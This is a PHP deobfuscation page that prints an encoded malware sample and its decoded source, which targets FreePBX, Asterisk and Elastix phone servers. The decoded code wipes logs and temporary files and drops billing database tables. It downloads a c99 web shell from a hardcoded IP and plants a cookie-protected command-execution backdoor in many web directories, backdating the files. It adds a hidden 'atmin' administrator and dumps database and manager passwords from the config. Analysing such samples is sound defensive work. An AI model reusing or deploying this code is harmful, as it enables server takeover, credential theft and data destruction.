Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode("eJwNV0WyxUgOvMususMLM8WsDM/MbG8mzMzs08+vA6hCKSWo..
Decoded Output download
ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf")?"/etc/asterisk/freepbx.conf":"/etc/freepbx.conf";
is_file($file)?eval(str_replace(array('<?php','?>','require','include'),array('','','#require','#include'),file_get_contents($file))):'';
$amp_conf=(isset($amp_conf)?$amp_conf:array());
$amportal=array();
foreach(explode("
",file_get_contents("/etc/amportal.conf")) as $key => $val)
{
if(preg_match_all("/=/",$val,$amp3))
{
$exx=explode("=",$val);
$amportal[$exx[0]]=trim((isset($amp_conf[$exx[0]])?$amp_conf[$exx[0]]:str_replace($exx[0].'=','',$val)));
}
}
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser','AMPDBNAME' => 'asterisk'),$amp_conf,$amportal);
$oldcwd=getcwd();
is_dir($amp["AMPWEBROOT"])?chdir($amp["AMPWEBROOT"]):"";
$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
if($freespace < 100)
{
@exec("nohup find /var/log/ -type f | xargs -I {} cp /dev/null {} &");
@exec("nohup rm /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz &");
}
@exec("chmod 0000 /var/www/html/a2billing/");
$a2b= new simple_db_connect($amp['AMPDBHOST'],'a2billinguser','a2billing');
$a2b->select_db('mya2billing');
$a2b->query('drop table cc_ui_authen');
$a2b->query('drop table cc_agent');
$a2b->query('drop table cc_system_log');
$dirs=array($oldcwd.'/',getcwd().'/','/var/www/html/','/var/www/','/var/www/freepbx/','/var/www/localhost/','/opt/freepbx/');
foreach($dirs as $K => $V)
{
$dirs[]=$V.'panel/';
$dirs[]=$V.'recordings/';
$dirs[]=$V.'vtigercrm/';
$dirs[]=$V.'public_html/';
$dirs[]=$V.'html/';
$dirs[]=$V.'freepbx/';
}
$dirs=array_unique($dirs);
sort($dirs);
$contents=array(
'c' => file_get_contents('http://212.83.135.137/t/c99.txt'),
'codes' => '<?php $cmd=((isset($_COOKIE["t3rr0r"])) && (md5(sha1($_COOKIE["t3rr0r"]))=="aeb1ae6d167d80abb38e8e07eae36170"))? $_COOKIE["cmd"]: "echo \'Unauthorized T\'"; system($cmd); ?>'
);
$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
if($freespace > 100)
{
foreach($dirs as $k => $where)
{
if(is_dir($where))
{
(is_writeable($where))? write_dir($where): '';
$od=opendir($where);
while($rd=readdir($od))
{
$wd=$where.'/'.$rd;
(($rd != '..') && ($rd != '.')&& is_writeable($wd) && is_dir($wd))? write_dir($wd): '';
}
}
}
icwrite_dirs("/var/www/html/admin/modules/_cache/");
icwrite_dirs("/var/www/html/admin/modules/");
icwrite_dirs("/var/www/html/admin/assets/");
icwrite_dirs("/var/www/html/admin/libraries/");
icwrite_dirs("/var/www/html/recordings/misc/");
icwrite_dirs("/var/www/html/recordings/lang/");
}
$pass=random_password();
if(count($amp) > 3)
{
echo "
[+] Config Fetched ..";
$db = new simple_db_connect($amp['AMPDBHOST'],$amp['AMPDBUSER'],$amp['AMPDBPASS']);
echo "
[+] Connected To Database server ..";
$db->select_db($amp['AMPDBNAME']);
echo "
[+] Connected To Database ..";
$db->query("delete from ampusers where username='atmin'",'
[-] Issue Deleting User');
$query = $db->query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '".sha1($pass)."', '*' );","
[-] Wrong Column ,, trying another column ..");
if(!$query){ $query = $db->query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );","
[-]Couldn't Determine Column .. Should Add admin Manually .."); }
if($query){ echo "
[+] Admin User Added ..
[+] atmin : $pass
"; }
is_dir("../admin")? @symlink('../admin','atmin') : "";
is_dir("/var/www/html/admin")? @symlink('/var/www/html/admin','/var/www/html/recordings/atmin') : "";
}
else
{
echo "
[-] Should Work Manually on this server ..
";
}
if(is_file("/var/www/html/libs/paloSantoDB.class.php"))
{
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$pACL = new paloACL($pDB);
$query="SELECT id from acl_user where name='atmin'";
$iddb = $pDB->fetchTable($query);
$tid=$iddb[0][0];
if($tid < 2)
{
$pACL->createUser('atmin', '', md5($pass), '');
$iddb = $pDB->fetchTable($query);
$tid=$iddb[0][0];
}
$pACL->changePassword($tid,md5($pass));
$pACL->addToGroup($tid,1);
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "------------Thats-All----------
";
function write_dir($where)
{
write_file($where.'/config.all.php','c');
write_file($where.'/phpversions.php','codes');
}
function icwrite_dirs($where)
{
write_file($where.'/config.php','c');
write_file($where.'/index.php','codes');
}
function write_file($fname,$wtw)
{
GLOBAL $contents;
if($contents[$wtw] !== '')
{
file_put_contents($fname,$contents[$wtw]);
touch($fname,strtotime('-10 years',time()));
}
}
function random_password($length=7)
{
$set=array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
$str = 't';
for($i=0;$i<$length;$i++)
{
$str .= $set[rand(0, count($set)-1)];
}
return $str;
}
class simple_db_connect
{
var $link;
function simple_db_connect($host,$username,$password)
{
if(function_exists('mysqli_connect'))
{
$this->link = mysqli_connect($host,$username,$password) or print(mysqli_error($this->link));
}
elseif(function_exists('mysql_connect'))
{
$this->link = mysql_connect($host,$username,$password) or print(mysql_error());
}
}
function select_db($dbname)
{
if(function_exists('mysqli_select_db'))
{
mysqli_select_db($this->link,$dbname) or print(mysqli_error($this->link));
}
elseif(function_exists('mysql_select_db'))
{
mysql_select_db($dbname,$this->link) or print(mysql_error());
}
return true;
}
function query($query_data,$error_message='')
{
global $con;
if(function_exists('mysqli_query'))
{
$query = mysqli_query($this->link,$query_data) or print($error_message.mysqli_error($this->link));
}
elseif(function_exists('mysql_query'))
{
$query = mysql_query($query_data,$this->link) or print($error_message.mysql_error());
}
return $query;
}
}
@system("rm -rf /tmp/*.txt /tmp/*.php");
Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode("eJwNV0WyxUgOvMususMLM8WsDM/MbG8mzMzs08+vA6hCKSWovNLhn/o7p3wel63c93+ydC8J7H9Fmc9F+c9/SuU2Big8H7t9Haty53fBYy6Fy5FHDM8wrv3TSSMCD0zwk95eC1WloFOsgO6cKpaItuJDK1KBtHvaQWx+J+x6JxDw3wbSI4RwKx3ClSvghBAFPZMp2ZL86V+XCi+m8q/K/6z1ReD21r/YjCcmXm+737p37HlR9F2IdxBKEVvk3C2k2E2UtkZeHnEitNivMO2s0Yx9e+4oDDHVIH9Ucvi/ZLBbOIEhgY7BE8fgQY6bZu5p4EguM0K4e/wtnuYJDvkwB9FIhgS0t/nDX1lYXcjHwod1a6OUWVAHI6EyAQ/CzNmNXsVMDoI3Ud9ZrammY2L10lYpvnxt9Fix8a+klvmkp/aKyAKAuOcSNoLi7tIyZ57bTtqESwBWPKmle4ze9L2mEyzFKnSmutdYaCAM7zkda9cbWOpCYTEXv2EkKAIjt9ghz58AzjBf7DIp1m3ICaL47noNWWd0pT2EUfY2ceEPu4wZdx615KCv8vlZ0nMT3BUCCAyOQ9wW2XWtrqMVIDYAWcjCOjJQQxUCFtkV1Ixsg3Rl/bLyLYVepCMQu1QqTSeLJzDekhDpJ8jbXV8JAZv4k+rcDuQ0CMuTC57aO7E/ty9xHdBwly5KRtH8YAAzx1BN4LDoxw5WsgZU30MFSvw8azlortU41jAEDyWhFB5pqKJnhv2UoCSenOlnKPBmx+jaKLBu+ql38K8E97Ku97vifHeUH96OQk3gzITwWpZcHoZkZRKoxGbhb0LDX/OrUmwmJxgVl8EpCdubB5ELtXqj8CPsg1VdpethC5O9zCphUHV8n46RgV16Z6oJCDeTCHkEqC7XK6kB4ia+q1KmJIcUD13eIFvQz2x905v7OWp0V/tLSo1YKY5a72TVBkekqHKiJArL9zTlDGLAh1Hl9kF4jcAlqJmjcFS6nctEvYQm+VGS2mGDA/zicNm8QAzUMQBtnsYY7XyXPpiaqaq3/uAXIT6LBxHvOzYcQXxA0itN0Yh8+AJ9wn96RJ37CG5E4x2qiewCI/cPa0XWfo9WwNfzK1TXT9ajg0tZKz0PQ//UTYHq5zXlDHXoMB5NwfCQmtT1Wd3fH2j3eD03Fw5J024YuhAyP/6ndugSaKpTxEz2qUALBYd2YlvAZj/jh2dNZUtbIMoiaxJynPiiOasDLOoNw4Gv1+XsHmkGYnvUCG2897FgFUdPB6/iCsVrHH2262rQ2KI0sArCZ7ds7Ou1ZLbMFEnFPmif3dm+hbDqHirkDvGDbunt8TdGqdR8cdcvFUO4yfdSt7veq4Moy8kaG5Xa0GNbpZyo++K6+e4lk1G7/C2XPKm15qgsOfd8xXt85NEC93qhmBhYbPeTlBHW4SduWO+9w0wXaxi/8bkc+oaEXM8Od3sFvgnhYZcl5VicfArZ+HaaYqWr5Yf/tUV017IxP8JongVzUTSX5whGVgT9piyVVM8yNk8HeSi9cDvvxIvTVUiKfnZSPsDI1x1ZFYKyb/NmDhk8GZ79/I2j3n6qdy3Yk3mYLkCms/J7MBRql1gVvONO2+30nNhQQK6R3mNkYqGrcTzPm73khpot8rkNvifhPITUDUhiQrInCFyymLSY+1UcJJN6jpXcRi3wxFBGQikZIYeMzz2mIOJjHEx/vzeeGC8IgXNqt861T9P+gtJJfDEJo8DvJZLg2xIXFgfOl7j6SDp1Run1MJ/9R32cdyaL2qJegfwkwjmE8ziFd3umBxozA4gl9Bt+LkOH8rCHYM8pyYDdLR77RX3raR2IvA3whBUXsXOUdJOSnaehVLVWz4gjD6P7SP/6+OE3mqKLPsjHXM/b48drTJCk5gi+BkVBC5U1/aLKHbmJJ8G+E/1OBUwbndbABVtwwyEiwLFDo2M5E3ASd4ulxocBbOJHUA45iTMl7LOTHp3meaBe2TIkz3JbPXQGq8zmZS3sp5j/eeBl0b/+x+HYlx9ZKttpD9Q59oGLzJCwk9krNNC6/LE3XxWD8sxShlbaXOwB+OJLdPCxWLDgUn38VriJJiYd8oHQqE9Bcx+4K02CH38MhrVtWX7UC+XMFc8hSns8/2qLILgwY60Ke2De9FBtHLwZ+OOXB62tnvfvi+YQ+UAH5ww2a7FjaJZEwD9qHCNE5/ZrNFOo1OnYiHc1lWqWSFYaL+S2wURm+gmU6pS2MIUF3pvHNFkNGvzba2/nOUktmmQrg7u8E/ZW2TXcZXgsTMqkJpX0sV9tf+C5kOqwstSnzJ1NgsSmPPSRxgfhpfLKfnGtm6TzniIvUbAtXWX9C3GJQpSALBoftg5F/tNz+Csruwkw1YUAHEqQ7GYmvX6A65S4SI0TiFnJXqyZa3OGrJiBESZyrQq6N2NrldzyVO2BFGJrTDszQ+U2+OJ6qWodZ3OtSQJo+HDDUZM/dY+ksEDObV6tVwbfQdNcz88G3qqN3b97DHExHG3lzNZWH4S964VH3yIng9Z6eAlZaWUEGrZcMfIWgTA5J6dm7k5Ssc3u+VlY4x47m8HeVXCk3LQFgz5uc4Df73yQ4Ve8wKHhuwe90koyqDGVgjQIImvH5EZZsVyXKmMFiFHAuwUThAq2Imf9vUY+aibqPX5ZMuuP98jZumdaRleEv1T4sh3i1V6ERo2oB6Y7kjNTYuVPJ8BltWqEXoDteU8fvsQ/DEI9l4seG5xU8lSnzal2zyJGiyMq/IxKlDvIi3psxq/cg2Gjhlk0jiEl+zMvXvaVcKF61KPPtNkfm8twuf9LWSaVxNJBYmudqpdmTVTMeloN72RHlbEwnZ8jgbbRu81b8HUqs+aznIYj6uSnV5u4sNyi/6U2NKHcc3Wi7898mmKV7OiH+jImVomIyX95GCEnu11Q63sBTt83mRPFkUPmmRjkTWdT0yvXrBUJxZUw1ukV4KPfiGfEeExTS9tX3zkIHPgcjzhLhDX6rYFSB3o9suVhAEwZdNW/pzqVPOd9zeqBe2nl1XGhSiR1TY7FubJnrxCkQuVpqnzWgjH2bGLJ/Lqt4DbWR4F4SCEXVdFsBdguM9V+zSqm6QGv7qF+BnnAXjUv0w5TY6mWYvOSdmi9HTeZmXKqCm8ngGVaLhrZhD9rNCWikxVERlchVoN7aoe4Clcg2l0RYrjttv7CCaaUCJSqfyan98oiE17mnju6+xYFrK9VwxaGSFy83UZP8lpTvRCSZNhRP1bqIPeO7zliMoHCScuIw25J33Yaa65M4UBJRqhJ7njZVmvitE3QwAwwTVk0DJytITg4ggYsME/ulMi2x983zD3+pfVlyT1pdaChnHJFuUB6Af1s/sxvkEeZ661MIF/kTdy0snz2uTZgUBEkZCBwimYAEOu3EzufhgB9Oo6+cBHv+CqE5u3LlUOhzmU7v3W3cF3fxJV5D1SX6wMtzkMYTlEyZswIkBXm+zsS4OepZgGk2mu1fVwkgh8xKVMZvV8j2fq3sAInkYK2fUsbYlLci92fKJSr8det+GApQFzTSBch8YbkaExxiASDMLWCbTUvtL/1/kH3MVObRH4SniAF+nGUdeADOzJgRDaTpjTZDyp89CPxJb9IZhE0rZBDS4pm/K3eIfIklE1A+cpd5w38NMYiSeyNTk1O0+tjhsNKW84CUIXux6xXN3rq3Be0YKKjvwMOStT9d0j35WgmcMfW9Oj4XwIcFtFsaJEUP6pgeTcxYgPTEaQsYTfUpuk7sZV/kMU/PTia3pKnUnTlkxkbx9hjmKYgFT1V7QAQneEvdGb9boWrGoOTMeH+LXvaQshc/jLO9TClVJI32uQDliOfeb+aiYkuARiVTqnaoyMfRADd9hzPXI1I+g3MBGvolq3yO3ZjVWSJlsfBCCph4Ji6C766eU7YaMn3FJm80MEPJb2l+cdc2gW7bKeZWYvsjyEU0iUscweXU2Ih0TPf1DJaSEA/APhDF+p5I+rrXs95juHGJlsbpSH+9rIAjT8VhB2IsbSuMXDUlku9+ljAolOfWBJv1Mqy5w83cwuF/fHF+keLBZH4GAtEJHawfPFif5k64gPwHxgP0FiHLgvWNb90++AlgEJcRaTPW18jTmHDzChje3ElHoAQZo6vcXFSiEyLU+eTpWXs3h/MCLrx1AjPldrk/uKlqheB144zjfi8O5gnnsiBd/bi1JLhXPv+kW5m8gUR4AXpFbv4W1HMSWeZOt2dkHUTtoYXRtTWhuzpFLc27yntqYXNhggbehinLuw/A7nBNr5C9PxhFgIZ2yNs8yIgwN0iTqNMuuQnoinGEs4R2AL0sEsQKxWVA1S7shQ0wVw/LljNf5ILgiQ6oSAIViUI3oD4i5r2P//+++9//w/awpJB")));
?>
Function Calls
gzuncompress | 11 |
base64_decode | 11 |
Stats
MD5 | cd56e2c43685f272f87de115698031f3 |
Eval Count | 11 |
Decode Time | 114 ms |